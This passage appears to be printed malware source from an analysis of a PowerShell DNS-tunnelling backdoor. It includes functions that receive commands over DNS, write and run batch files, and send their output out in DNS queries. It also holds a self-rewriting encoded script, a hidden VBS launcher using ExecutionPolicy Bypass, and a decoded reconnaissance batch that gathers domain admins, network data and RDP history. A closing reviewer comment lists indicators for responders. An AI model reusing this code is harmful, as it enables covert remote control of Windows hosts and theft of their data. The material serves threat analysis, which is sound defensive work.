    ('#'+'##');
    }
    elseif($global:myflag -eq 0 -and $mydata.StartsWith('33.33.'))
    {
    $tmp = $mydata.SubString(6).Split('.');
    $global:filename = ([char] [int] $tmp[0]) + ([char] [int] $tmp[1]);
    $global:myflag = 1;
    }
    elseif ($mydata.Equals('35.35.35.35'))
    {
    $global:myflag = 0;
    }
    elseif ($global:myflag -eq 1)
    {
    $tmp = $mydata.Split('.');
    [System.IO.File]::AppendAllText($global:myhome+'tp\'+$global:filename+".bat", (([char] [int] $tmp[0]) + ([char] [int] $tmp[1]) + ([char] [int] $tmp[2]) + ([char] [int] $tmp[3])));
    }
    elseif($global:myid -eq '#'+'##')
    {
    ([char] [int] $mydata.Split('.')[0]);
    }
    }
    function FixBatFile ($batpath)
    {
    (Get-Content $batpath).Substring(10) | Set-Content $batpath;
    }
    function SendFile($myFilePath)
    {
    $myFileName = [System.IO.Path]::GetFileNameWithoutExtension($myFilePath);
    $mystr = [System.IO.File]::ReadAllText($myFilePath);
    $i=0;
    $mytemp = '';
    $j=0;
    while($i -le $mystr.Length)
    {
    $mytemp += $mystr[$i];
    if((($i%24) -eq 23) -or ($i -eq $mystr.Length))
    {
    $myhex = Str2Hex $mytemp;
    SendReceiveDNS ((GetSub 2 $myFileName (convertTo-Base36 $j)) + $myhex);
    $j++;
    $mytemp = '';
    }
    $i++;
    }
    }
    function GetID
    {
    $validchars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    $tid = SendReceiveDNS ((GetSub 0)+'30');
    if ($validchars.Contains($tid)){$global:myid=$tid;}
    }
    function ChangeThisFile ($botid)
    {
    if(-not($global:myid -eq ('#'+'##')))
    {
    $fc=(Get-Content $env:Public\Libraries\RecordedTV\DnS.ps1 -Encoding Ascii);
    $fc=$fc.SubString($fc.IndexOf('powershell -EncodedCommand \"')+29).TrimEnd('\"');
    $fc=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($fc));
    $fc=$fc -replace ('#'+'##'),$botid;
    $fc=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($fc));
    $fc='powershell -EncodedCommand "'+$fc+'"';
    Set-Content $env:Public\Libraries\RecordedTV\DnS.ps1 $fc -Encoding Ascii;
    }
    }
    function Init
    {
    if($global:myid -eq ('#'+'##'))
    {
    md -Force ($global:myhome+'tp\');
    GetID;
    ChangeThisFile $global:myid;
    }
    }
    function main
    {
    Init;
    if(Alive -eq 1)
    {
    Invoke-Expression ($global:myhome+'tp\'+$global:filename+'.bat > '+$global:myhome+'tp\'+$global:filename+'.txt');
    SendFile ($global:myhome+'tp\'+$global:filename+'.txt');
    Remove-Item ($global:myhome+'tp\'+$global:filename+'.bat');
    Remove-Item ($global:myhome+'tp\'+$global:filename+'.txt');
    }
    }
    main;

    ---------------------------------- backup.vbs ----------------------------------
    In Cell X1
    HOME="%public%\Libraries\RecordedTV\"
    DnECmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnE.ps1"
    CreateObject("WScript.Shell").Run DnECmd,0
    DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnS.ps1"
    CreateObject("WScript.Shell").Run DnsCmd,0


    ---------------------------------- ----------------------------------

    QGVjaG8gb2ZmJmNoY3AgNjUwMDEmIHdob2FtaSAyPiYxICYgaG9zdG5hbWUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19JcENvbmZpZ19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIGlwY29uZmlnIC9hbGwgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19Eb21pYW4gQWRtaW5zX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldCBncm91cCAiZG9tYWluIGFkbWlucyIgL2RvbWFpbiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX25ldCBsb2NhbCBncm91cCBtZW1iZXJzX19fX19fX19fX19fX19fX19fX19fX19fICYgbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19uZXRzdGF0X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldHN0YXQgLWFuIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fc3lzdGVtaW5mb19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiBzeXN0ZW1pbmZvIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fUkRQX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiByZWcgcXVlcnkgIkhLRVlfQ1VSUkVOVF9VU0VSXFNvZnR3YXJlXE1pY3Jvc29mdFxUZXJtaW5hbCBTZXJ2ZXIgQ2xpZW50XERlZmF1bHQiIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19DdXN0b20gQ29tbWFuZF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiB3bWljIG9zIGdldCBDYXB0aW9uIC92YWx1ZSB8IG1vcmUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19UYXNrX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIHNjaHRhc2tzIC9xdWVyeSAvRk8gTGlzdCAvVE4gIkdvb2dsZVVwZGF0ZVRhc2tzTWFjaGluZVVJIiAvViB8IGZpbmRzdHIgL2IgL24gL2M6IlJlcGVhdDogRXZlcnk6IiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fIA==
    decodes to:

    @echo off&chcp 65001& whoami 2>&1 & hostname 2>&1 & echo ________________________________IpConfig______________________________ & ipconfig /all 2>&1 & echo __________________________Domian Admins_______________________________ & net group "domain admins" /domain 2>&1 & echo _______________________net local group members________________________ & net localgroup administrators 2>&1 & echo ________________________________netstat_______________________________ & netstat -an 2>&1 & echo _____________________________systeminfo_______________________________ & systeminfo 2>&1 & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1 & echo ____________________________Custom Command_______________________________ & wmic os get Caption /value | more 2>&1 & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN "GoogleUpdateTasksMachineUI" /V | findstr /b /n /c:"Repeat: Every:" 2>&1 & echo ______________________________________________________________________
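Review bot: The second script heading `----------------------------------------------- DnE.ps1 ----------------------------------` (the one preceding the `$global:myhost` DNS beacon) repeats the first heading, while the macro's `cmd` string writes that encoded payload to `DnS.ps1` and the decoded script itself reads and rewrites `$env:Public\Libraries\RecordedTV\DnS.ps1` in `ChangeThisFile`; the heading should read `DnS.ps1` so the HTTP channel and the DNS channel are not confused. The "In Cell X1" remark above backup.vbs is worth extending to the other two cells `doom_Init` pulls from, `Cells(1, 25)` (Y1) for the DnE payload and `Cells(1, 26)` (Z1) for the DnS payload, e.g. `' cells X1/Y1/Z1 of sheet "Incompatible" hold backup.vbs, DnE.ps1, DnS.ps1 as base64`. A short indicator summary next to the sample hash would also help responders, since the drop directory `%PUBLIC%\Libraries\RecordedTV\`, the scheduled task `GoogleUpdateTasksMachineUI` firing every 3 minutes (`/sc minute /mo 3`), and the domain `main-google-resolver.com` used by both channels are all already in the listing but scattered across it.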